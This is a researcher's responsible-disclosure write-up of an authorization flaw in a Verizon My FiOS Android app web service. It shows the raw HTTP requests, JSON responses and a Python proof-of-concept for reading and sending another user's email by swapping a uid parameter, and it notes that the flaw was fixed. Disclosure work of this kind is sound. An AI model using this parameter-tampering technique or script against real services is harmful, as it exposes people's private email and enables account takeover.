As a Verizon FiOS customer, I had never used the My FiOS app for Android to manage my account. Since Verizon has a good amount of my information, I thought it would be a good candidate for research. I was right and the results were astonishing. I identified a vulnerability in one of the My FiOS web services that allowed access to any user’s Verizon email account. This included reading their inbox, individual messages, and even sending on their behalf. One can realize the seriousness of this issue, since obtaining access to someone’s email can be used to access a number of other accounts, e.g. banking, Facebook, etc.
While proxying the requests from my device, I noticed an interesting call to fetch the emails in my inbox. The result is used to populate an inbox preview on the main screen of the app, shown here:
And here’s the corresponding web request:
GET http://www.verizon.com/mobilesvc/messagecenter/members/service/getEmail?format=json&uid=RWESTERGREN05&failOverSize=25&failOverStart=0&fid=INBOX HTTP/1.1 Host: www.verizon.com Connection: Keep-Alive Cookie: dotcomsid=***REMOVED***; webmailssoID=***REMOVED*** Cookie2: $Version=1 User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.2; SCH-I545 Build/KOT49H) appversioncode [9121] devId: 4d6acc45e433f97f appId: com.verizon.oxygen appVer: v2.10.11-9121 os: ANDROID osVer: 4.4.2 csid: ***REMOVED*** model: samsung:SCH-I545 cid: Verizon Wireless net: TYPE_WIFI sid: RWESTERGREN05 pd: userinfo: ***REMOVED***
It was interesting to see two direct references to my username, particularly this parameter: getEmail?format=json&uid=RWESTERGREN05
The response is a JSON object containing the header information for the emails in my inbox (a shortened list for readability):
{
"error": {
"code": "0",
"msg": ""
},
"res": {
"batchStart": "0",
"fid": "INBOX",
"flush": "true",
"folderFlags": [],
"msgHeaderList": [
{
"CallerTN": null,
"ContextID": null,
"Duration": null,
"ExpiryDate": null,
"MBOX": null,
"MessageID": null,
"MessageType": null,
"OrignalArrTime": null,
"VzTN": null,
"attachments": "false",
"date": 1389160576000,
"fid": "INBOX",
"flagged": false,
"flags": [],
"isCertified": false,
"isFwd": false,
"isRe": false,
"mid": "28",
"num": 28,
"priority": false,
"recipient": {
"address": "",
"personal": ""
},
"reqReceipt": false,
"returnPath": "[email protected]",
"sender": {
"address": "[email protected]",
"personal": "Verizon Services"
},
"size": "24",
"subject": "Start your New Year with an amazing deal on FiOS",
"unread": false
},
{
"CallerTN": null,
"ContextID": null,
"Duration": null,
"ExpiryDate": null,
"MBOX": null,
"MessageID": null,
"MessageType": null,
"OrignalArrTime": null,
"VzTN": null,
"attachments": "false",
"date": 1311269441000,
"fid": "INBOX",
"flagged": false,
"flags": [],
"isCertified": false,
"isFwd": false,
"isRe": false,
"mid": "27",
"num": 27,
"priority": false,
"recipient": {
"address": "",
"personal": ""
},
"reqReceipt": false,
"returnPath": "[email protected]",
"sender": {
"address": "[email protected]",
"personal": "Verizon Notifications"
},
"size": "13",
"subject": "Important Changes to your Verizon Internet Account for FTP* Users",
"unread": false
},
{
"CallerTN": null,
"ContextID": null,
"Duration": null,
"ExpiryDate": null,
"MBOX": null,
"MessageID": null,
"MessageType": null,
"OrignalArrTime": null,
"VzTN": null,
"attachments": "false",
"date": 1256580554000,
"fid": "INBOX",
"flagged": false,
"flags": [],
"isCertified": false,
"isFwd": false,
"isRe": false,
"mid": "4",
"num": 4,
"priority": false,
"recipient": {
"address": "",
"personal": ""
},
"reqReceipt": false,
"returnPath": "[email protected]",
"sender": {
"address": "[email protected]",
"personal": null
},
"size": "3",
"subject": "Important Information Regarding Your Verizon Online Account",
"unread": true
}
],
"resultSize": "28",
"timeZone": null,
"totalMsgNum": 28,
"totalunreadMsgNum": 0,
"uidNext": "29",
"uidValidity": "1250267216",
"uids": [
28,
27,
26,
25,
24,
23,
22,
21,
20,
19,
18,
17,
16,
15,
14,
13,
12,
11,
10,
9,
8,
7,
6,
5,
4,
3,
2,
1
]
}
}
Altering the uid parameter and specifying another username shouldn’t have an effect, since I’m logged in and my session is maintained through my cookies. Amazingly, this was not the case. Substituting the uid with the username of another email account indeed returned the contents of their inbox. This was enough of an issue, but I immediately questioned whether the other API methods were affected.
Using the returned header list, one can read individual inbox messages by substituting the corresponding mid and uid in the following GET request:
http://www.verizon.com/mobilesvc/messagecenter/members/service/reademail?format=json&uid=RWESTERGREN05&mid=28&fid=INBOX
The response:
{
"error": {
"code": "0",
"msg": ""
},
"res": {
"attachments": [],
"bcc": [],
"bodyhtml": "\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n \r\n <table border=\"0\" cellspacing=\"0\" cellpadding=\"0\" width=\"100%\" bgcolor=\"#ffffff\" text=\"#373737\"><tbody><tr><td valign=\"top\">\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n\r\n \r\n \r\n<table class=\"width-300\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\" width=\"600\" align=\"center\" valign=\"top\" style=\"width:600px; border-collapse:collapse; border-spacing:0;\"><tbody><tr><td bgcolor=\"#ffffff\" colspan=\"4\" style=\"padding-top:10px; padding-left:20px; padding-right:20px; padding-bottom:5px;\">\r\n \r\n \r\n \r\n \r\n \r\n \r\n <table class=\"width-260\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\"><tbody><tr valign=\"top\"><td class=\"float-left\" bgcolor=\"#ffffff\">\r\n \r\n \r\n \r\n \r\n \r\n <table width=\"360\" class=\"width-260\" bgcolor=\"#ffffff\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td align=\"left\" valign=\"middle\" style=\"font-family:verdana; font-size:9px; color:#252525; background-color:#ffffff; line-height:16px;\"><span class=\"ph\">Make 2014 your most entertaining year yet</span></td></tr></tbody></table></td><td class=\"float-left\" valign=\"top\" align=\"right\">\r\n \r\n \r\n \r\n \r\n \r\n \r\n <table width=\"200\" class=\"width-260\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td align=\"right\" valign=\"middle\" style=\"font-family:verdana; font-size:9px; color:#a2a2a2; background-color:#ffffff; line-height:16px;\" class=\"phLeftAlign\"><span class=\"phLeftAlign\"><a href=\"https://econtact.verizon.com/ecrm/includes/html/vzfwd.html?destination=http%3A%2F%2Fwww22.verizon.com%2FForyourhome%2FMyAccount%2FUnprotected%2FUserManagement%2FLogin%2FLogin.aspx%3FCMP%3DEMC-CON_2014-Q1_MM-ACQ-eCRMTXIDFDO13027a_0120&txid=B20140107_2018988596&lid=946634&tid=31926&vno=1&ltid=1323227\" target=\"_blank\" style=\"color:#0066cc;text-decoration:none;text-decoration:none;\"><span style=\"color:#0066cc;text-decoration:none;text-decoration:none !important; outline:0;\">Update Email</span></a> | <a href=\"https://econtact.verizon.com/ecrm/includes/html/vzfwd.html?destination=http%3A%2F%2Fimages-promo.verizon.com%2FACQ%2F2013%2FJanuary_ACQ%2FJanuary_ACQ_V9_OL.html%3FCMP%3DEMC-CON_2014-Q1_MM-ACQ-eCRMTXIDFDO13027a_0120&txid=B20140107_2018988596&lid=946635&tid=31926&vno=1&ltid=1323228\" target=\"_blank\" style=\"color:#0066cc;text-decoration:none;text-decoration:none;\"><span style=\"color:#0066cc;text-decoration:none;text-decoration:none !important; outline:0;\">View Online</span></a></span>\r\n </td></tr></tbody></table></td></tr></tbody></table></td></tr><tr><td bgcolor=\"#ffffff\" valign=\"bottom\">\r\n \r\n \r\n \r\n \r\n \r\n\r\n \r\n \r\n \r\n \r\n <table class=\"width-300\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\" width=\"600\"><tbody><tr height=\"1\"><td width=\"600\" bgcolor=\"#d2d3d4\" height=\"1\" style=\"height:1px!important;\"></td></tr><tr valign=\"top\"><td style=\"padding-left:20px; padding-right:20px; padding-bottom:10px;\">\r\n <a href=\"https://econtact.verizon.com/ecrm/includes/html/vzfwd.html?destination=http%3A%2F%2Fwww.verizon.com%3FCMP%3DEMC-CON_2014-Q1_MM-ACQ-eCRMTXIDFDO13027a_0120&txid=B20140107_2018988596&lid=946636&tid=31926&vno=1&ltid=1323229\" target=\"_blank\" style=\"outline:0;\"><img src=\"http://images-promo.verizon.com/ACQ/global_images/September_CR_01.jpg\" width=\"84\" height=\"84\" border=\"0\" alt=\"Verizon\" title=\"Verizon\" style=\"display:inline-block;\" /></a>\r\n </td></tr></tbody></table></td></tr><tr><td bgcolor=\"#ffffff\" class=\"header-image\">\r\n \r\n \r\n \r\n \r\n \r\n \r\n <table class=\"header-image\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\" style=\"width:600px; border-collapse:collapse; border-spacing:0;\" width=\"600\"><tbody><tr valign=\"top\"><td class=\"float-left\" valign=\"top\">\r\n \r\n \r\n \r\n \r\n \r\n \r\n <table class=\"header-image\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\" style=\"width:600px; border-collapse:collapse; border-spacing:0;\"><tbody><tr><td valign=\"top\" bgcolor=\"#ffffff\" style=\"width:600px;\" class=\"header-image\">\r\n <a href=\"https://econtact.verizon.com/ecrm/includes/html/vzfwd.html?destination=http%3A%2F%2Fwww.verizon.com%2Fhome%2FMLP%2FonlineFTPOFW.html%3Fx1%3Dzlfg1936%26CMP%3DEMC-CON_2014-Q1_MM-ACQ-eCRMTXIDFDO13027a_0120&txid=B20140107_2018988596&lid=946637&tid=31926&vno=1&ltid=1323230\" target=\"_blank\" style=\"outline:0;\"><img src=\"http://images-promo.verizon.com/ACQ/2013/January_ACQ/images/FDO13027-0107-ACQ(002).jpg\" alt=\"Get our lowest price of the year with FiOS\" title=\"Get our lowest price of the year with FiOS\" border=\"0\" style=\"display:block;\" class=\"header-image\" width=\"600\" /></a>\r\n </td></tr></tbody></table></td></tr></tbody></table></td></tr><tr><td bgcolor=\"#ffffff\" colspan=\"4\">\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n <table class=\"width-300\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\" width=\"600\"><tbody><tr valign=\"top\"><td class=\"float-left\" valign=\"top\" bgcolor=\"#ecedef\" height=\"100%;\">\r\n \r\n \r\n \r\n \r\n \r\n \r\n <table class=\"width-300\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\" height=\"100%;\"><tbody><tr><td width=\"300\" valign=\"top\"><img src=\"http://images-promo.verizon.com/OVL/2013/006_jun/Jun_M2M_Term_Email/images/spacer.gif\" width=\"300\" height=\"1\" border=\"0\" style=\"display:block;\" /></td></tr></tbody></table>\r\n </td><td class=\"float-left\" valign=\"top\" bgcolor=\"#ecedef\" height=\"100%;\">\r\n \r\n \r\n \r\n \r\n \r\n \r\n <table class=\"width-300\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\" height=\"100%;\"><tbody><tr><td width=\"300\" valign=\"top\"><img src=\"http://images-promo.verizon.com/OVL/2013/006_jun/Jun_M2M_Term_Email/images/spacer.gif\" width=\"300\" height=\"1\" border=\"0\" style=\"display:block;\" /></td></tr></tbody></table>\r\n </td></tr><tr><td bgcolor=\"#ecedef\" colspan=\"4\" style=\"padding-bottom:20px\">\r\n \r\n \r\n \r\n \r\n \r\n \r\n <table class=\"width-300\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\" width=\"600\"><tbody><tr valign=\"top\"><td class=\"float-left\" style=\"padding-top:20px;\">\r\n \r\n \r\n \r\n \r\n \r\n <table class=\"width-300\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td valign=\"bottom\" bgcolor=\"#ecedef\" style=\"width:90px;padding-left:20px; padding-right:20px;\" class=\"width-300\"><span><img src=\"http://images-promo.verizon.com/ACQ/global_images/fios_logo.png\" width=\"78\" height=\"29\" alt=\"FiOS\" title=\"FiOS\" border=\"0\" style=\"display:block; margin:0 auto;\" /></span></td></tr></tbody></table></td><td class=\"float-left\" align=\"right\" valign=\"top\" style=\"padding-top:20px;\">\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n <table class=\"width-300\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td width=\"29\" style=\"padding-left:20px;\" bgcolor=\"#ecedef\" class=\"mobile-icon\"><a href=\"https://econtact.verizon.com/ecrm/includes/html/vzfwd.html?destination=https%3A%2F%2Fwww.pinterest.com%2Fverizonfios%3FCMP%3DEMC-CON_2014-Q1_MM-ACQ-eCRMTXIDFDO13027a_0120&txid=B20140107_2018988596&lid=946638&tid=31926&vno=1&ltid=1323231\" target=\"_blank\" style=\"outline:0;\"><img src=\"http://images-promo.verizon.com/ACQ/global_images/icon_pinterest.png\" width=\"29\" height=\"29\" alt=\"Pinterest\" title=\"Pinterest\" border=\"0\" style=\"display:block; valign:center;\" class=\"mobile-icon\" /></a></td><td width=\"9\" bgcolor=\"#ecedef\"><span><img src=\"http://images-promo.verizon.com/OVL/2013/006_jun/Jun_M2M_Term_Email/images/spacer.gif\" width=\"9\" height=\"1\" border=\"0\" style=\"display:block;\" /></span></td><td width=\"29\" bgcolor=\"#ecedef\" class=\"mobile-icon\"><a href=\"https://econtact.verizon.com/ecrm/includes/html/vzfwd.html?destination=http%3A%2F%2Fwww.facebook.com%2FVerizonFiOS%3FCMP%3DEMC-CON_2014-Q1_MM-ACQ-eCRMTXIDFDO13027a_0120&txid=B20140107_2018988596&lid=946639&tid=31926&vno=1&ltid=1323232\" target=\"_blank\" style=\"outline:0;\"><img src=\"http://images-promo.verizon.com/ACQ/global_images/icon_facebook.png\" width=\"29\" height=\"29\" alt=\"Facebook\" title=\"Facebook\" border=\"0\" style=\"display:block; valign:center;\" class=\"mobile-icon\" /></a></td><td width=\"9\" bgcolor=\"#ecedef\"><span><img src=\"http://images-promo.verizon.com/OVL/2013/006_jun/Jun_M2M_Term_Email/images/spacer.gif\" width=\"9\" height=\"1\" border=\"0\" style=\"display:block;\" /></span></td><td width=\"29\" bgcolor=\"#ecedef\" class=\"mobile-icon\"><a href=\"https://econtact.verizon.com/ecrm/includes/html/vzfwd.html?destination=https%3A%2F%2Ftwitter.com%2Fverizonfios%3FCMP%3DEMC-CON_2014-Q1_MM-ACQ-eCRMTXIDFDO13027a_0120&txid=B20140107_2018988596&lid=946640&tid=31926&vno=1&ltid=1323233\" target=\"_blank\" style=\"outline:0;\"><img src=\"http://images-promo.verizon.com/ACQ/global_images/icon_twitter.png\" width=\"29\" height=\"29\" alt=\"Twitter\" title=\"Twitter\" border=\"0\" style=\"display:block; valign:center;\" class=\"mobile-icon\" /></a></td><td width=\"9\" bgcolor=\"#ecedef\"><span><img src=\"http://images-promo.verizon.com/OVL/2013/006_jun/Jun_M2M_Term_Email/images/spacer.gif\" width=\"9\" height=\"1\" border=\"0\" style=\"display:block;\" /></span></td><td width=\"31\" bgcolor=\"#ecedef\" class=\"mobile-icon\"><a href=\"https://econtact.verizon.com/ecrm/includes/html/vzfwd.html?destination=http%3A%2F%2Fwww.youtube.com%2Fuser%2Fverizon%3FCMP%3DEMC-CON_2014-Q1_MM-ACQ-eCRMTXIDFDO13027a_0120&txid=B20140107_2018988596&lid=946641&tid=31926&vno=1&ltid=1323234\" target=\"_blank\" style=\"outline:0;\"><img src=\"http://images-promo.verizon.com/ACQ/global_images/icon_youtube.png\" width=\"31\" height=\"29\" alt=\"YouTube\" title=\"YouTube\" border=\"0\" style=\"display:block; valign:center;\" class=\"mobile-icon\" /></a></td><td width=\"9\" bgcolor=\"#ecedef\"><span><img src=\"http://images-promo.verizon.com/OVL/2013/006_jun/Jun_M2M_Term_Email/images/spacer.gif\" width=\"9\" height=\"1\" border=\"0\" style=\"display:block;\" /></span></td><td width=\"31\" bgcolor=\"#ecedef\" class=\"mobile-icon\"><a href=\"https://econtact.verizon.com/ecrm/includes/html/vzfwd.html?destination=https%3A%2F%2Fplus.google.com%2F%2Bverizonfios%2Fposts%3FCMP%3DEMC-CON_2014-Q1_MM-ACQ-eCRMTXIDFDO13027a_0120&txid=B20140107_2018988596&lid=946642&tid=31926&vno=1&ltid=1323235\" target=\"_blank\" style=\"outline:0;\"><img src=\"http://images-promo.verizon.com/ACQ/global_images/icon_googleplus.png\" width=\"31\" height=\"29\" alt=\"google+\" title=\"google+\" border=\"0\" style=\"display:block; valign:center;\" class=\"mobile-icon\" /></a></td><td width=\"9\" bgcolor=\"#ecedef\"><span><img src=\"http://images-promo.verizon.com/OVL/2013/006_jun/Jun_M2M_Term_Email/images/spacer.gif\" width=\"9\" height=\"1\" border=\"0\" style=\"display:block;\" /></span></td><td width=\"29\" style=\"padding-right:20px;\" bgcolor=\"#ecedef\" class=\"mobile-icon\"><a href=\"https://econtact.verizon.com/ecrm/includes/html/vzfwd.html?destination=https%3A%2F%2Fwww.verizon.com%2Fforyourhome%2FMyAccount%2Fngen%2Fupr%2Fnlogin.aspx%3FLOBCode%3DC%26PromoTCode%3DMZV07%26PromoSrcCode%3DV%26POEId%3DVU1SP%26CMP%3DEMC-CON_2014-Q1_MM-ACQ-eCRMTXIDFDO13027a_0120&txid=B20140107_2018988596&lid=946643&tid=31926&vno=1&ltid=1323236\" target=\"_blank\" style=\"outline:0;\"><img src=\"http://images-promo.verizon.com/ACQ/global_images/icon_verizon.png\" width=\"29\" height=\"29\" alt=\"my verizon\" title=\"my verizon\" border=\"0\" style=\"display:block; valign:center;\" class=\"mobile-icon\" /></a></td></tr></tbody></table></td></tr></tbody></table></td></tr><tr><td bgcolor=\"#ffffff\" colspan=\"4\">\r\n \r\n \r\n \r\n \r\n \r\n \r\n <table class=\"width-300\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\" width=\"600\"><tbody><tr valign=\"middle\"><td class=\"float-left\" bgcolor=\"#ffffff\" style=\"padding-bottom:20px\">\r\n \r\n \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n<table class=\"width-300\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td valign=\"top\" bgcolor=\"#ffffff\" style=\"width:560px; font-family:Arial, Helvetica, sans-serif; font-size:13px; line-height:18px; color:#959595; background-color:#ffffff; padding:20px 20px 0 20px;\" class=\"width-300\">\r\nADVERTISEMENT<br /><br />Offer for new <span style=\"text-transform:uppercase !important;\">F</span><span style=\"text-transform:lowercase !important;\">i</span><span style=\"text-transform:uppercase !important;\">OS</span> TV or Internet res. custs. subscribing to a <span style=\"text-transform:uppercase !important;\">F</span><span style=\"text-transform:lowercase !important;\">i</span><span style=\"text-transform:uppercase !important;\">OS</span> TV Prime HD, <span style=\"text-transform:uppercase !important;\">F</span><span style=\"text-transform:lowercase !important;\">i</span><span style=\"text-transform:uppercase !important;\">OS</span> 15/5 Mbps Internet and Verizon Freedom<span class=\"“regMark”\" style=\"“font-family:Lucida\" sans=\"Sans\" unicode=\"Unicode\" sans-serif=\"sans-serif\" important=\"important\" rdquo=\"rdquo\">®</span> Essentials or <span style=\"text-transform:uppercase !important;\">F</span><span style=\"text-transform:lowercase !important;\">i</span><span style=\"text-transform:uppercase !important;\">OS</span> Digital Voice bundle online. Promo rate via $35 bill credit for 12 mos. and $5 bill credit for mos. 13-24; beg. mo. 25, stand. monthly rates apply. $3.48 Regional Sports Network Fee, & other fees, taxes, equip. charges & terms apply. Activation fee waived via bill credit. Subj. to credit approval & may require a deposit. <span style=\"text-transform:uppercase !important;\">F</span><span style=\"text-transform:lowercase !important;\">i</span><span style=\"text-transform:uppercase !important;\">OS</span> avail. in select areas. Actual speeds may vary. Where applicable, battery backup avail. for standard fiber-based voice service, <span style=\"text-transform:uppercase !important;\">F</span><span style=\"text-transform:lowercase !important;\">i</span><span style=\"text-transform:uppercase !important;\">OS</span><span class=\"“regMark”\" style=\"“font-family:Lucida\" sans=\"Sans\" unicode=\"Unicode\" sans-serif=\"sans-serif\" important=\"important\" rdquo=\"rdquo\">®</span> Digital Voice & E911 (but not other voice services). Must sign up by 1/18/14. ©2014 Verizon. <br /><br /> Verizon is dedicated to protecting your privacy and will not share your email address and information with anyone. <a href=\"https://econtact.verizon.com/ecrm/includes/html/vzfwd.html?destination=http%3A%2F%2Fwww22.verizon.com%2Fabout%2Fprivacy%2F%3FCMP%3DEMC-CON_2014-Q1_MM-ACQ-eCRMTXIDFDO13027a_0120&txid=B20140107_2018988596&lid=946644&tid=31926&vno=1&ltid=1323237\" target=\"_blank\" style=\"color:#0066CC;text-decoration:none;\"><span style=\"color:#0066CC;text-decoration:none;outline:0;\" class=\"legal-link\">Privacy Policy</span></a> \r\n</td></tr><tr><td valign=\"top\" bgcolor=\"#ffffff\" style=\"width:560px; font-family:Arial, Helvetica, sans-serif; font-size:13px; line-height:18px; color:#959595; background-color:#ffffff; padding:20px 20px 0 20px;\" class=\"width-300\">\r\nPlease do not reply to this email as this mailbox is not monitored. You may <a href=\"https://econtact.verizon.com/ecrm/includes/html/vzfwd.html?destination=https%3A%2F%2Fecontact.verizon.com%2Fecrm%2Funsubscribe.serv%3FCMP%3DEMC-CON_2014-Q1_MM-ACQ-eCRMTXIDFDO13027a_0120&txid=B20140107_2018988596&lid=946645&tid=31926&vno=1&ltid=1323238&[email protected]\" target=\"_blank\" style=\"color:#0066CC;text-decoration:none;\"><span style=\"color:#0066CC;text-decoration:none;outline:0;\" class=\"legal-link\">unsubscribe</span></a> from Verizon promotional emails at any time. Please allow up to 10 business days for Verizon to process your opt-out request.\r\n</td></tr><tr><td valign=\"top\" bgcolor=\"#ffffff\" style=\"width:560px; font-family:Arial, Helvetica, sans-serif; font-size:13px; line-height:18px; color:#959595; background-color:#ffffff; padding:20px 20px 0 20px;\" class=\"width-300\">\r\n©2014 Verizon. All Rights Reserved.<br />\r\nVerizon Services Corp | One Verizon Way | Basking Ridge, NJ 07920\r\n</td></tr></tbody></table></td></tr></tbody></table></td></tr></tbody></table></td></tr></tbody></table>\r\n <img width=\"0\" height=\"0\" src=\"http://econtact.verizon.com/ecrm/EmailTracking.serv?TXID=B20140107_2018988596\" />\r\n</td></tr></tbody></table>",
"cc": [],
"date": 1389160576000,
"fid": "INBOX",
"mid": "28",
"msgheaders": [
{
"CallerTN": null,
"Date": "01/08/2014",
"Duration": null,
"ExpiryDate": null,
"MessageID": null,
"MessageType": null,
"OriginalArrivalTime": null,
"Subject": "Start your New Year with an amazing deal on FiOS",
"TN": null
}
],
"sender": {
"address": "[email protected]",
"personal": "Verizon Services"
},
"subject": "Start your New Year with an amazing deal on FiOS",
"timezone": "-21600",
"to": [
{
"address": "[email protected]"
}
]
}
}
Using the same parameter substitution, one was able to read the email messages of other users. It was my suspicion that all of the API methods for this widget within the app were vulnerable. My last test was sending an outgoing message as another user. This request was also successful:
POST http://www.verizon.com/mobilesvc/messagecenter/members/service/sendEmail HTTP/1.1 Content-Type: application/x-www-form-urlencoded Content-Length: 186 Host: www.verizon.com Connection: Keep-Alive Cookie: dotcomsid=***REMOVED***; webmailssoID=***REMOVED*** Cookie2: $Version=1 User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.2; SCH-I545 Build/KOT49H) appversioncode [9121] devId: 4d6acc45e433f97f appId: com.verizon.oxygen appVer: v2.10.11-9121 os: ANDROID osVer: 4.4.2 csid: 1421439892800-2L29M09 model: samsung:SCH-I545 cid: Verizon Wireless net: TYPE_WIFI sid: RWESTERGREN05 pd: userinfo: ***REMOVED*** omid=&action=4&actionType=&Event=ComposeEmail&NetworkStatus=Y&fid=Inbox&uid=RWESTERGREN05&mailTo=test%40test.com&mailSub=test&mailBody=Test+outgoing&mailCC=&mailBcc=&attachment=
The severity of this issue was immediately apparent. My next step was to write a quick proof-of-concept to demonstrate the vulnerability in preparation to send it over to Verizon.
import requests
# Valid credentials required
validUsername = "RWESTERGREN05"
validPassword = ""
# Mailbox to fetch
targetUsername = ""
def do_login(username, password):
s = requests.Session()
url = "https://auth.verizon.com/amserver/UI/Login?realm=dotcom&module=AIAW"
payload = "IDToken1=%s&aamAuth=Y&minimalView=Y&RemMe=on&clientId=mobilefios" %username
headers = {"Content-Type": "application/x-www-form-urlencoded",
"Connection": "Keep-Alive", "User-Agent": None}
r = s.post(url=url, data=payload,allow_redirects=False,verify=False, headers=headers)
payload = "IDToken1=%s&aamAuth=Y&minimalView=Y&RemMe=on&clientId=mobilefios" %password
headers = {"Cookie2" : "$Version=1", "Content-Type": "application/x-www-form-urlencoded",
"Connection": "Keep-Alive"}
r2 = s.post(url=url, data=payload, headers=headers, allow_redirects=False)
if not (s.cookies.get("dotcomsid")):
raise Exception("Error logging in")
else:
return s
s = do_login(username=validUsername, password=validPassword)
url = "http://www.verizon.com/mobilesvc/messagecenter/members/service/getEmail?format=json&" \
"uid=%s&failOverSize=20&failOverStart=0&fid=INBOX" % targetUsername
r = s.get(url=url)
if r.json().get("res"):
headerList = r.json().get("res").get("msgHeaderList")
for header in headerList:
subject = header.get("subject")
sender = header.get("sender").get("address")
print "%s - %s" % (sender, subject)
The script logs a valid user into the web service, fetches the inbox message headers for the target user, and prints out the from address and subject lines.
The next step was to reach out to Verizon. Being such a large company, I thought it was probably going to be difficult to get in contact with the right people. I tried their Twitter account, but their customer service reps weren’t very helpful. After reading this article, I figured reaching out to someone at [email protected] would at least point me in the right direction. They actually responded very quickly and confirmed they were the right group to report the issue to.
Disclosure Timeline
2015-01-14: Initial report to Verizon’s security group
2015-01-14: Verizon confirms receiving report, investigation begins
2015-01-15: Follow-up email with acknowledgement of the issue
2015-01-16: Fix released and confirmed
Verizon’s security group seemed to immediately realize the impact of this vulnerability and took it very seriously. They were very responsive during this process and even arranged for a free year of FiOS Internet service as a token of their gratitude.
Share this:
